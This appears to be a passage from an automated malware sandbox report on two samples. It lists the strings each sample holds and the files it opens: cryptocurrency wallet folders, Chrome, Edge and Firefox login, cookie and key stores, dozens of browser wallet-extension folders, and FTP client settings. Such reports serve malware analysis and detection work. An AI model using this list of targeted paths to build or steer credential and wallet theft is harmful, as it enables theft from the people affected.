Source: file.exe, 00000000.00000003.2167852382.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s/Electrum-LTCDuOKvC'
Source: 26e226f915.exe String found in binary or memory: Wallets/ElectronCash
Source: file.exe String found in binary or memory: Jaxx Liberty
Source: 26e226f915.exe String found in binary or memory: window-state.json
Source: file.exe String found in binary or memory: ExodusWeb3
Source: 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: file.exe, 00000000.00000003.2197812548.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe String found in binary or memory: keystore
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
